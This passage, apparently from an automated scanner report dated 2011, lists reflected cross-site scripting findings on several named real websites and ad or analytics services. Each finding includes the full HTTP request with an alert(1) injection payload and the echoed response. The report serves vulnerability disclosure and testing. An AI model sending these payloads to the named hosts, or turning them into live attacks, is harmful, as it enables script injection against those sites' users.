This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /alfresco/d/d/workspace/SpacesStored66f5'style%3d'x%3aexpression(alert(1))'245274776c4/e91137de-5ec9-482e-a154-b55e1f592129/st%20barts%20thumb.jpg?guest=true HTTP/1.1
Host: admin.paradizo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://paradizo.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 30 Sep 2011 13:12:49 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 12514
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>Alfresco Web Client - System Error</title>
<link rel="sear
...[SNIP]...
<a href='/alfresco/d/d/workspace/SpacesStored66f5'style='x:expression(alert(1))'245274776c4/e91137de-5ec9-482e-a154-b55e1f592129/st%20barts%20thumb.jpg'>
...[SNIP]...

2.29. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/e91137de-5ec9-482e-a154-b55e1f592129/st%20barts%20thumb.jpg [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admin.paradizo.com
Path:   /alfresco/d/d/workspace/SpacesStore/e91137de-5ec9-482e-a154-b55e1f592129/st%20barts%20thumb.jpg

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6447f'style%3d'x%3aexpression(alert(1))'292ae7cce94 was submitted in the REST URL parameter 6. This input was echoed as 6447f'style='x:expression(alert(1))'292ae7cce94 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /alfresco/d/d/workspace/SpacesStore/e91137de-5ec9-482e-a154-b55e1f5921296447f'style%3d'x%3aexpression(alert(1))'292ae7cce94/st%20barts%20thumb.jpg?guest=true HTTP/1.1
Host: admin.paradizo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://paradizo.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 30 Sep 2011 13:12:54 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 12514
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>Alfresco Web Client - System Error</title>
<link rel="sear
...[SNIP]...
<a href='/alfresco/d/d/workspace/SpacesStore/e91137de-5ec9-482e-a154-b55e1f5921296447f'style='x:expression(alert(1))'292ae7cce94/st%20barts%20thumb.jpg'>
...[SNIP]...

2.30. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/f18b5f55-1064-468b-8763-fa81ebb0d9db/valais-thumb.jpg [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admin.paradizo.com
Path:   /alfresco/d/d/workspace/SpacesStore/f18b5f55-1064-468b-8763-fa81ebb0d9db/valais-thumb.jpg

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6ed18'style%3d'x%3aexpression(alert(1))'75b03c5340a was submitted in the REST URL parameter 4. This input was echoed as 6ed18'style='x:expression(alert(1))'75b03c5340a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /alfresco/d/d/workspace6ed18'style%3d'x%3aexpression(alert(1))'75b03c5340a/SpacesStore/f18b5f55-1064-468b-8763-fa81ebb0d9db/valais-thumb.jpg?guest=true HTTP/1.1
Host: admin.paradizo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://paradizo.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 30 Sep 2011 13:12:43 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 12508
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>Alfresco Web Client - System Error</title>
<link rel="sear
...[SNIP]...
<a href='/alfresco/d/d/workspace6ed18'style='x:expression(alert(1))'75b03c5340a/SpacesStore/f18b5f55-1064-468b-8763-fa81ebb0d9db/valais-thumb.jpg'>
...[SNIP]...

2.31. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/f18b5f55-1064-468b-8763-fa81ebb0d9db/valais-thumb.jpg [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admin.paradizo.com
Path:   /alfresco/d/d/workspace/SpacesStore/f18b5f55-1064-468b-8763-fa81ebb0d9db/valais-thumb.jpg

Issue detail

The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 200fd'style%3d'x%3aexpression(alert(1))'b5fbc9553d9 was submitted in the REST URL parameter 5. This input was echoed as 200fd'style='x:expression(alert(1))'b5fbc9553d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /alfresco/d/d/workspace/SpacesStore200fd'style%3d'x%3aexpression(alert(1))'b5fbc9553d9/f18b5f55-1064-468b-8763-fa81ebb0d9db/valais-thumb.jpg?guest=true HTTP/1.1
Host: admin.paradizo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://paradizo.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 30 Sep 2011 13:12:48 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 12508
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>Alfresco Web Client - System Error</title>
<link rel="sear
...[SNIP]...
<a href='/alfresco/d/d/workspace/SpacesStore200fd'style='x:expression(alert(1))'b5fbc9553d9/f18b5f55-1064-468b-8763-fa81ebb0d9db/valais-thumb.jpg'>
...[SNIP]...

2.32. http://admin.paradizo.com/alfresco/d/d/workspace/SpacesStore/f18b5f55-1064-468b-8763-fa81ebb0d9db/valais-thumb.jpg [REST URL parameter 6]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://admin.paradizo.com
Path:   /alfresco/d/d/workspace/SpacesStore/f18b5f55-1064-468b-8763-fa81ebb0d9db/valais-thumb.jpg

Issue detail

The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2b94d'style%3d'x%3aexpression(alert(1))'a492a5a48d was submitted in the REST URL parameter 6. This input was echoed as 2b94d'style='x:expression(alert(1))'a492a5a48d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /alfresco/d/d/workspace/SpacesStore/f18b5f55-1064-468b-8763-fa81ebb0d9db2b94d'style%3d'x%3aexpression(alert(1))'a492a5a48d/valais-thumb.jpg?guest=true HTTP/1.1
Host: admin.paradizo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://paradizo.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Fri, 30 Sep 2011 13:12:54 GMT
Server: Apache
Vary: Accept-Encoding
Content-Length: 12503
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>Alfresco Web Client - System Error</title>
<link rel="sear
...[SNIP]...
<a href='/alfresco/d/d/workspace/SpacesStore/f18b5f55-1064-468b-8763-fa81ebb0d9db2b94d'style='x:expression(alert(1))'a492a5a48d/valais-thumb.jpg'>
...[SNIP]...

2.33. http://allgetaways.us.intellitxt.com/al.asp [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://allgetaways.us.intellitxt.com
Path:   /al.asp

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 6542e%3balert(1)//ed29044e6d9 was submitted in the jscallback parameter. This input was echoed as 6542e;alert(1)//ed29044e6d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /al.asp?ts=20110930131113&cc=us&hk=1&ipid=6384&mh=97d8f389c08e8287618c5f161321f7f5&pvm=7b27089c41b5430573e55e8e79ff6932&pvu=747440E0FCCB4F3499D8A96FF530E3EA&rcc=--&so=0&prf=ll%3A1562%7Cintl%3A2725%7Cadvint%3A2767%7Cadvl%3A2767%7Ctl%3A2767&jscallback=$iTXT.js.callback16542e%3balert(1)//ed29044e6d9 HTTP/1.1
Host: allgetaways.us.intellitxt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.allgetaways.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ITXTCtxtHistOff=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=""; Domain=.intellitxt.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Content-Type: text/javascript
Content-Length: 65
Date: Fri, 30 Sep 2011 13:12:43 GMT
Age: 0
Connection: keep-alive

try{$iTXT.js.callback16542e;alert(1)//ed29044e6d9();}catch(e){}

2.34. http://allgetaways.us.intellitxt.com/intellitxt/front.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://allgetaways.us.intellitxt.com
Path:   /intellitxt/front.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16ad2'-alert(1)-'1fd3983422a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /intellitxt/front.asp?ipid=6384&16ad2'-alert(1)-'1fd3983422a=1 HTTP/1.1
Host: allgetaways.us.intellitxt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.allgetaways.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ITXTCtxtHistOff=1

Response

HTTP/1.1 200 OK
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Set-Cookie: VM_USR=""; Domain=.intellitxt.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript;charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 11240
Date: Fri, 30 Sep 2011 13:11:42 GMT
Age: 0
Connection: keep-alive

document.itxtDebugOn=0;if('undefined'==typeof $iTXT){$iTXT={};};$iTXT.debug={Log:function()
{},Category:{},error:function()
{},info:function()
{},debug:function()
{},trace:function()
{},Util:{isLoggin
...[SNIP]...
.itxtRunning=1;$iTXT.js.qaol=false;
$iTXT.js.gaEnabled=false;$iTXT.js.serverUrl='http://allgetaways.us.intellitxt.com';$iTXT.js.serverName='allgetaways.us.intellitxt.com';$iTXT.js.pageQuery='ipid=6384&16ad2'-alert(1)-'1fd3983422a=1';$iTXT.js.ipid='6384';$iTXT.js.umat=true;$iTXT.js.startTime=(new Date()).getTime();(function(){var e=document.createElement("img");e.src="http://b.scorecardresearch.com/b?c1=8&c2=6000002&c3=100000&c
...[SNIP]...

2.35. http://allgetaways.us.intellitxt.com/v4/init [jscallback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://allgetaways.us.intellitxt.com
Path:   /v4/init

Issue detail

The value of the jscallback request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload c56a3%3balert(1)//1ebdcfc32fb was submitted in the jscallback parameter. This input was echoed as c56a3;alert(1)//1ebdcfc32fb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1317388272762&pagecl=5371&fv=10&muid=&refurl=http%3A%2F%2Fwww.allgetaways.com%2F&ipid=6384&jscallback=$iTXT.js.callback0c56a3%3balert(1)//1ebdcfc32fb HTTP/1.1
Host: allgetaways.us.intellitxt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.allgetaways.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ITXTCtxtHistOff=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript;charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 6300
Date: Fri, 30 Sep 2011 13:13:17 GMT
Age: 0
Connection: keep-alive

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
et('initskip',0);$iTXT.data.Context.params.set('minimagew',180);$iTXT.data.Context.params.set('minimageh',200);$iTXT.data.Context.params.set('intattrs','alt,title,href,src,name');try{$iTXT.js.callback0c56a3;alert(1)//1ebdcfc32fb({"requiresContextualization":0,"requiresAdverts":1});}catch(e){}

2.36. http://allgetaways.us.intellitxt.com/v4/init [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://allgetaways.us.intellitxt.com
Path:   /v4/init

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload de85a"-alert(1)-"de26da41502 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /v4/init?ts=1317388272762&pagecl=5371&fv=10&muid=&refurl=http%3A%2F%2Fwww.allgetaways.com%2F&ipid=6384&jscallback=$iTXT.js.callback0&de85a"-alert(1)-"de26da41502=1 HTTP/1.1
Host: allgetaways.us.intellitxt.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.allgetaways.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ITXTCtxtHistOff=1

Response

HTTP/1.1 200 OK
Cache-Control: private
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: CP="NON DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM CNT STA PRE LOC"
Access-Control-Allow-Origin: *
Content-Type: application/x-javascript;charset=iso-8859-1
Vary: Accept-Encoding
Content-Length: 6281
Date: Fri, 30 Sep 2011 13:13:30 GMT
Age: 0
Connection: keep-alive

var undefined;if(null==$iTXT.glob.dbParams||undefined==$iTXT.glob.dbParams){$iTXT.glob.dbParams=new $iTXT.data.Param(undefined,undefined,undefined,'DATABASE');}$iTXT.glob.dbParams.set({"searchengine.h
...[SNIP]...
":"5371","fv":"10","ts":"1317388272762","dma":0,"POSTCODE":"","user-agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1","REGIONNAME":"","de85a"-alert(1)-"de26da41502":"1","muid":"","city":"","ipid":6384,"jscallback":"$iTXT.js.callback0","reg":"--","refurl":"http://www.allgetaways.com/","rcc":"--","cc":"us"},null,60);var undefined;if(null==$iTXT.glob.params||undefi
...[SNIP]...

2.37. http://api-public.addthis.com/url/shares.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api-public.addthis.com
Path:   /url/shares.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload d719d<script>alert(1)</script>abf05b2ddc9 was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /url/shares.json?url=http%3A%2F%2Freservation.travelaffiliatepro.com%2Fhotel%2Fdetails%2FONCUNSU%3FaffiliateId%3D4048&callback=_ate.cbs.sc_httpreservationtravelaffiliateprocomhoteldetailsONCUNSUaffiliateId404869d719d<script>alert(1)</script>abf05b2ddc9 HTTP/1.1
Host: api-public.addthis.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://reservation.travelaffiliatepro.com/hotel/details/ONCUNSU?affiliateId=4048
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: loc=US%2COTUxMDFOQVVTQ0EyMTczMDU4MTgwNzczNjIwVg%3d%3d; dt=X; uid=0000000000000000; uvc=34|35,136|36,57|37,55|38,27|39

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-Control: max-age=600
Content-Type: application/javascript;charset=UTF-8
Date: Fri, 30 Sep 2011 13:15:20 GMT
Content-Length: 140
Connection: close

_ate.cbs.sc_httpreservationtravelaffiliateprocomhoteldetailsONCUNSUaffiliateId404869d719d<script>alert(1)</script>abf05b2ddc9({"shares":0});

2.38. http://api.bizographics.com/v1/profile.json [api_key parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the api_key request parameter is copied into the HTML document as plain text between tags. The payload 22e77<script>alert(1)</script>4ec3b6033fc was submitted in the api_key parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?cb=1317388297065&api_key=6332f8b7316a4d1284e9c1217a36734722e77<script>alert(1)</script>4ec3b6033fc&callback=bizo.parseBizo HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.golflink.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 403 Forbidden
Cache-Control: no-cache
Content-Type: text/plain
Date: Fri, 30 Sep 2011 13:12:55 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Set-Cookie: BizoID=f682fb6a-4760-4bea-84a1-46826f42cd69;Version=0;Domain=.bizographics.com;Path=/;Max-Age=15768000
Content-Length: 92
Connection: keep-alive

Unknown API key: (6332f8b7316a4d1284e9c1217a36734722e77<script>alert(1)</script>4ec3b6033fc)

2.39. http://api.bizographics.com/v1/profile.json [callback parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://api.bizographics.com
Path:   /v1/profile.json

Issue detail

The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 3e44f<script>alert(1)</script>4e84c1b4cce was submitted in the callback parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /v1/profile.json?cb=1317388297065&api_key=6332f8b7316a4d1284e9c1217a367347&callback=bizo.parseBizo3e44f<script>alert(1)</script>4e84c1b4cce HTTP/1.1
Host: api.bizographics.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://www.golflink.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BizographicsOptOut=OPT_OUT

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: application/json
Date: Fri, 30 Sep 2011 13:13:02 GMT
P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM"
Pragma: no-cache
Server: nginx/0.7.61
Content-Length: 268
Connection: keep-alive

bizo.parseBizo3e44f<script>alert(1)</script>4e84c1b4cce({"bizographics":{"group":{"code":"tech_business_professional","name":"Tech Business Professional"},"industry":[{"code":"software","name":"Software"}],"location":{"code":"texas","name":"USA - Texas"}},
...[SNIP]...

2.40. http://b.scorecardresearch.com/beacon.js [c1 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c1 request parameter is copied into the HTML document as plain text between tags. The payload 1da37<script>alert(1)</script>ca288e58596 was submitted in the c1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=81da37<script>alert(1)</script>ca288e58596&c2=2113&c3=13&c4=20734&c5=48075&c6=&c10=248531&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://ad.fr.doubleclick.net/adi/han.ab/qp%7Cfrance%7Cprovence-alpes-c%C3%B4te_dazur%7Cprovence-alpes-c%C3%B4te_dazur;ptype=qp;lang=fr;site=fr;owner=false;n1=france;n2=provence-alpes-c%C3%B4te_dazur;n3=null;n4=null;n5=null;n6=null;ref=hax;pos=btfb;sz=300x250;tile=2;mtfifpath=/ad-iframe-scripts/doubleclick/;ord=6682509?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Fri, 14 Oct 2011 13:17:09 GMT
Date: Fri, 30 Sep 2011 13:17:09 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
E.purge=function(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"81da37<script>alert(1)</script>ca288e58596", c2:"2113", c3:"13", c4:"20734", c5:"48075", c6:"", c10:"248531", c15:"", c16:"", r:""});



2.41. http://b.scorecardresearch.com/beacon.js [c10 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c10 request parameter is copied into the HTML document as plain text between tags. The payload 4613c<script>alert(1)</script>28f6bfdb32b was submitted in the c10 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=8&c2=2113&c3=13&c4=20734&c5=48075&c6=&c10=2485314613c<script>alert(1)</script>28f6bfdb32b&c15= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: */*
Referer: http://ad.fr.doubleclick.net/adi/han.ab/qp%7Cfrance%7Cprovence-alpes-c%C3%B4te_dazur%7Cprovence-alpes-c%C3%B4te_dazur;ptype=qp;lang=fr;site=fr;owner=false;n1=france;n2=provence-alpes-c%C3%B4te_dazur;n3=null;n4=null;n5=null;n6=null;ref=hax;pos=btfb;sz=300x250;tile=2;mtfifpath=/ad-iframe-scripts/doubleclick/;ord=6682509?
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=9951d9b8-80.67.74.150-1314793633

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=1209600
Expires: Fri, 14 Oct 2011 13:17:12 GMT
Date: Fri, 30 Sep 2011 13:17:12 GMT
Content-Length: 1249
Connection: close

if(typeof COMSCORE=="undefined"){var COMSCORE={}}if(typeof _comscore!="object"){var _comscore=[]}COMSCORE.beacon=function(k){try{if(!k){return}var i=1.8,l=k.options||{},j=l.doc||document,b=l.nav||navi
...[SNIP]...
h-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();


COMSCORE.beacon({c1:"8", c2:"2113", c3:"13", c4:"20734", c5:"48075", c6:"", c10:"2485314613c<script>alert(1)</script>28f6bfdb32b", c15:"", c16:"", r:""});



2.42. http://b.scorecardresearch.com/beacon.js [c15 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c15 request parameter is copied into the HTML document as plain text between tags. The payload dead0<script>alert(1)</script>2fd33f4ff81 was submitted in the c15 parameter. This input was echoed unmodified in the application's response.

